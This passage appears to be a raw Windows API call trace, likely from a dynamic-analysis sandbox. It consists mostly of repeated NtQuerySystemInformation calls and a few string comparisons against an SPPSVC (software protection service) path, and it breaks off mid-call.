NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7f0, Length=0x28, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe870, Length=0x28, ResultLength=0x0) [0229.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe870, Length=0x28, ResultLength=0x0) [0229.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7d0, Length=0x20, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7d0, Length=0x20, ResultLength=0x0) [0229.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe760, Length=0x20, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe760, Length=0x20, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0229.024] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x28, ResultLength=0x0) [0229.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x28, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8d0, Length=0x20, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe990, Length=0x20, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0229.279] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x50, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe940, Length=0x28, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0229.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x28, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea30, Length=0x28, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8d0, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe850, Length=0x20, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb10, Length=0x38, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe990, Length=0x20, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe920, Length=0x20, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x28, ResultLength=0x0) [0229.300] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x50, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x28, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x28, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x28, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x20, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x38, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x20, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 